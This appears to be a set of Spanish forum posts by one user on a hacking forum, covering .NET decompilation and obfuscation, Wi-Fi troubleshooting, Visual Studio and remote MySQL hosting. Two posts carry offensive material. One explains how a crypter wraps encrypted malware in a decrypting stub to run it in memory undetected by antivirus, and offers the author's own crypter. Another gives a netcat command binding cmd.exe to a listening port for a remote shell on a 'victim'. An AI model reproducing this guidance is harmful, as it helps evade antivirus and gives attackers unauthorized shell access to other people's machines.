@karmany: ¿Si aplicase el Control Flow obfuscation no se podria obtener el código MSIL y por lo tanto no se

podria interpretar en su alto nivel (.NET)? Si es así, ¿podrías recomendarme algun escrito sobre como aplicar dicha

protección o en su defecto algun ofuscador que aplique dicha técnica? ¿Se podría desofuscar y obtener el código original?

@MCKSys Argentina -- karmany: Sobre lo que comentabais de traducir directamente el código MSIL a nativo sin tener que depender del CLR suena bastante interesante, ya que si lo tenemos directamente en código nativo la decompilación y el posible descifrado del código serían bastante tediosas y no te cuento si le metemos un par de medidas de seguridad
más. Ya estoy buscando sobre el tema, a ver que tal me va.

@adastra: Estoy de acuerdo contigo en la parte de la implementación de seguridad mediante el código, pues es bien sabido que el mal diseño de un programa puede hacerlo vulnerable. Sin embargo, no me hace ninguna gracia que una plataforma como .NET tenga una pésima seguridad, refiriéndome a la protección de código, ya que puedes decompilar un ejecutable escrito en cualquier lenguaje de dicha plataforma y obtener su código en segundos. Aunque apliques ofuscación al código, éste es fácilmente obtenible por desofuscadores que pueden con casi todo. Realmente Microsoft no hizo los deberes, .NET lo considero un lenguaje inseguro.

Cualquier recomendación que me deis es agradecida.

Saludos!

La inseguridad se debe a que .NET es interpretado y al generar cualquier aplicación está es traducida a un lenguaje intermedio (MSIL) o bytecode.

Al ejecutar dicha aplicación el CLR, que no es más que un entorno de ejecucción, se encarga de traducir el código intermedio (MSIL) a lenguaje máquina, por lo que nunca tendremos dentro de un ejecutable código máquina sino un lenguaje intermedio lo que hace posible la obtención del Source mediante la interpretación de ese código intermedio.

.NET -> código intermedio -> CLR -> código máquina.

Espero tu respuesta karmany, ya que me preocupa bastante la inseguridad que brindan este tipo de lenguajes.

Saludos!

Prueba a reinstalar wicd, sino busca como conectarte utilIzando iwconfig y dhclient. A ver si la forma manual da resultado.

Saludos!

Al parecer el Wicd en la nueva versión r3 no es capaz de conectar con redes WEP. Si no es el caso, ¿probaste a introducir la clave en ASCII o HEX y desactivando DHCP e introduciendo la IP, netmask y DNS manualmente?

Saludos!

Buenas noches a todos!

Como no sé si esto va en la sección de Ing. Inversa, .NET o seguridad pues me he decantado por la primera.

Estoy preocupado porque programo en .NET y todos sabemos que en nuestros programas, cuando eramos novatillos pues incluiamos información confidencial que no quisieramos que personas ajenas obtuvieran. He probado algun decompilador de .NET (Reflector, DotNet Resolver...) y he podido decompilar todo mi proyecto, ya sean .exe o .dll, ASUSTA! Vengo con los deberes hechos, pues leí algo sobre seguridad aplicada a programas en el blog de Karmany (Packers, métodos alternativos para generación de información sensible..) y lo estudiaré más a fondo cuando tenga que lanzar la aplicación.

Hay plugins para Visual Studio que ofuscan el Source del programa, pero recientemente he encontrado Desofuscadores para distintas versiones conocidas de ofuscadores, por lo que si ofuscase el programa, el código ofuscado lo podría desofuscar y obtendría el original. Es como si cada medida de seguridad tuviera una contramedida

Ya pensé en incluir la información confidencial en .dll, ensamblados cargados en la ejecucción del programa, archivos cifrados, pero ¿Cómo sé que un cracker no pueda descifrar el source para luego acceder a dicha info? ¿Qué métodos puedo emplear para aumentar la seguridad de mis programas?

Gracias por vuestra atención,

Saludos!

@Niensueños: si buscas que tu programa sea indetectable necesitas que el código del malware esté cifrado. Por lo tanto debes de incluir un programa antes del codigo de tu malware, el cual pueda descifrar dicho codigo malicioso y ejecutarlo en la memoria.

De esta manera tendrás el Stub + Firma + Programa dentro del virus resultante. El Stub va delante del codigo del malware, después tenemos la Firma y al final añadimos el codigo del virus, de esta manera el Stub se ejecutará primero y si encontró la Firma en su codigo entonces descifrará el código del virus, que está justo debajo de la firma y acto seguido lo ejecutará.

Así a bote pronto es como funciona un Crypter. Se puede extender muchisimo y se le pueden añadir las opciones de añadir ciertas funcionalidades al ejecutable resultante, ya lo ire implementando en un tiempo.

Estoy programando un Crypter, pues quiero estar seguro de que sea 100% indetectable frente a un AV, si estás interesado contacta conmigo.

Sólo tienes que buscarlo, te aseguro que lo encuentras. Eso si, hay muchos tipos de restricciones ya que hace poco encontré cierta Web que solo ofrece hosting de DB con la posibilidad de conexion remota, pero en lo que administracion se refiere pues no tiene PhpMyAdmin y los credenciales de la DB nos los da la propia Web.

Olvidate pues 000webhost no acepta conexiones remotas en MySQL, a no ser que hayas ordenado un pago para el servicio premium hehehe.

Busca un poquito en google sobre sitios que acepten MySQL remoto y encontraras a patadas.

Saludos!

Visual Studio no es más que una suite de aplicaciones para el desarrollo de programas en .NET. Personalmente utilizo la versión Express 2010 de VB, pues no necesito el resto de apps que trae Visual Studio.

Las versiones Express no traen más que lo necesario para programar en cierto lenguaje de .NET (C#, VB.NET, ASP.NET, Visual C++ ...), Visual Studio tiene todos los lenguajes incluidos y segun que versión de Visual Studio hayas descargado, pues incluye programas añadidos (instaladores...), pero eso depende de si los necesitas o no. En mi caso, tiro con la express como ya dije.

Saludos!

Entiendo que lo que quieres hacer es conectarte a la víctima mediante NetCat y que ésta actuará de servidor, pues la estas dejando a la escucha.

En netcat -> nc -L [Tu_IP] -p [Puerto] -e [comando]

-L Deja a la escucha NetCat en el puerto aunque se produzca una desconexion (escucha permanente)
-p Puerto en el que se quedara "escuchando"
-e Comando a ejecutar cuando se produzca la conexión (-e cmd.exe ejecutará la mitica Shell Remota)

Donde pone [Tu_IP] introduce tu IP si quieres que la victima acepte sólo peticiones de tu IP sobre dicho puerto. Si no introduces ninguna IP pues aceptará conexiones de cualquier IP sobre el puerto especificado.

Saludos!